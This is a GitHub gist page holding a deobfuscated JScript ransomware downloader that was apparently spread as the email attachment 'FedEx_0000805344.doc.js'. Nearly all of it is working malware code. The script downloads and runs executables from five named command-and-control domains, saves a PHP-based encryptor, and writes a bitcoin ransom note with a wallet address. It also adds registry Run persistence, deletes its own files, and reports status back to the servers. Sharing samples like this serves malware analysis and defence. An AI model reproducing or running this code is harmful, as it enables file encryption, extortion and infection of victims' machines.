Created
June 9, 2016 09:12
-
-
Save Antelox/e6a209767e88c965c6697cdbccb2bb85 to your computer and use it in GitHub Desktop.
Deobfuscated Javascript - Original one "FedEx_0000805344.doc.js"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var id = "TRMZDhCofKbv_q5hiDKefL875Yntf6t7_hOQK5aWmdOm2ocfp6cINwoJggYEDAZgrLxmdcW82GWld4k-xmgrFDct"; | |
| var ad = "14QHA8ycP4YMqtohbietj3JFKKjRkuPtv3"; | |
| var bc = "0.37070"; | |
| var ld = 0; | |
| var cq = String.fromCharCode(34); | |
| var cs = String.fromCharCode(92); | |
| var ll = ["masterline.info", "mos-traffik.ru", "nahabinonasporte.ru", "shkola.selivaniha.ru", "windigomsk.ru"]; | |
| var ws = WScript.CreateObject("WScript.Shell"); | |
| var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a"; | |
| var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll"; | |
| var xo = WScript.CreateObject("Msxml2.XMLHTTP"); | |
| var xa = WScript.CreateObject("ADODB.Stream"); | |
| var fo = WScript.CreateObject("Scripting.FileSystemObject"); | |
| if (!fo.FileExists(fn + ".txt")) { | |
| for (var n = 1; n <= 5; n++) { | |
| for (var i = ld; i < ll.length; i++) { | |
| var dn = 0; | |
| try { | |
| xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&id=" + id + "&rnd=" + i + n, false); | |
| xo.send(); | |
| if (xo.status == 200) { | |
| xa.open(); | |
| xa.type = 1; | |
| xa.write(xo.responseBody); | |
| if (xa.size > 1000) { | |
| dn = 1; | |
| if (n <= 2) { | |
| xa.saveToFile(fn + n + ".exe", 2); | |
| try { | |
| ws.Run(fn + n + ".exe", 1, 0); | |
| } catch (er) {}; | |
| } else if (n == 3) { | |
| xa.saveToFile(fn + ".exe", 2); | |
| } else if (n == 4) { | |
| xa.saveToFile(pd, 2); | |
| } else if (n == 5) { | |
| xa.saveToFile(fn + ".php", 2); | |
| } | |
| }; | |
| xa.close(); | |
| }; | |
| if (dn == 1) { | |
| ld = i; | |
| break; | |
| }; | |
| } catch (er) {}; | |
| }; | |
| }; | |
| if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) { | |
| xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=start", false); | |
| xo.send(); | |
| var fp = fo.CreateTextFile(fn + ".txt", true); | |
| fp.WriteLine("ATTENTION!"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("All your documents, photos, databases and other important personal files"); | |
| fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key."); | |
| fp.WriteLine("To restore your files you have to pay " + bc + " BTC (bitcoins)."); | |
| fp.WriteLine("Please follow this manual:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("1. Create Bitcoin wallet here:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" https://blockchain.info/wallet/new"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("2. Buy " + bc + " BTC with cash, using search here:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" https://localbitcoins.com/buy_bitcoins"); | |
| fp.WriteLine(""); | |
| fp.WriteLine("3. Send " + bc + " BTC to this Bitcoin address:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" " + ad); | |
| fp.WriteLine(""); | |
| fp.WriteLine("4. Open one of the following links in your browser to download decryptor:"); | |
| fp.WriteLine(""); | |
| for (var i = 0; i < ll.length; i++) { | |
| fp.WriteLine(" http://" + ll[i] + "/counter/?a=" + ad); | |
| }; | |
| fp.WriteLine(""); | |
| fp.WriteLine("5. Run decryptor to restore your files."); | |
| fp.WriteLine(""); | |
| fp.WriteLine("PLEASE REMEMBER:"); | |
| fp.WriteLine(""); | |
| fp.WriteLine(" - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES."); | |
| fp.WriteLine(" - Nobody can help you except us."); | |
| fp.WriteLine(" - It`s useless to reinstall Windows, update antivirus software, etc."); | |
| fp.WriteLine(" - Your files can be decrypted only after you make payment."); | |
| fp.WriteLine(" - You can find this manual on your desktop (DECRYPT.txt)."); | |
| fp.Close(); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /t REG_SZ /F /D " + cq + fn + ".txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + ".crypted" + cq + " /ve /t REG_SZ /F /D " + cq + "Crypted" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c REG ADD " + cq + "HKCR" + cs + "Crypted" + cs + "shell" + cs + "open" + cs + "command" + cq + " /ve /t REG_SZ /F /D " + cq + "notepad.exe " + cs + cq + fn + ".txt" + cs + cq + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c copy /y " + cq + fn + ".txt" + cq + " " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 0, 1); | |
| ws.Run("%COMSPEC% /c notepad.exe " + cq + fn + ".txt" + cq, 0, 0); | |
| var fp = fo.CreateTextFile(fn + ".php", true); | |
| for (var i = 0; i < 1000; i++) { | |
| fp.WriteLine(ad); | |
| }; | |
| fp.Close(); | |
| ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0); | |
| ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0); | |
| xo.open("GET", "http://" + ll[ld] + "/counter/?ad=" + ad + "&id=" + id + "&st=done", false); | |
| xo.send(); | |
| }; | |
| }; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment